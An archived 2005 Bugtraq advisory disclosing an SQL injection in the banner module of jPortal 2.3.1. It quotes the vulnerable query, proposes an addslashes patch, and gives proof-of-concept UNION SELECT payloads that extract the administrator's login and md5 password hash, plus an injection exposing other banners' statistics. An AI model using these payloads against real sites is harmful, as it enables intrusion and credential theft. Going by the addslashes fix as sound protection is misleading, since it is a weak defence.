| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 12 Apr 2005 09:13:14 +0200 From: "Marcin \"CiNU5\" Krupowicz" <marcin.krupowicz@...il.com> To: bugtraq@...urityfocus.com Subject: Sql injection in jPortal version 2.3.1 (module banner) Hello BugTraq, I've found possibility to inject sql code in jPortal version 2.3.1, in module "banner" (module/banner.inc.php). Bug is in these lines of code: $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; (line 192) There is unfiltered variable $haslo. In order to patch this code just add this: $haslo = addslashes($haslo); before above line. PoC: go to http://[victim]/jportal/banner.php and try this: ' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 and then: ' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 After that, You gain login and md5 hash password of administrator. PoC 2: try to inject this code: ' or id='x x - banner id After that, You can see statistics of not banners, to which you haven't got passwords. Vendor (http://jportal2.com) has been informed already. -- Best regards, Marcin "CiNU5" Krupowicz
Powered by blists - more mailing lists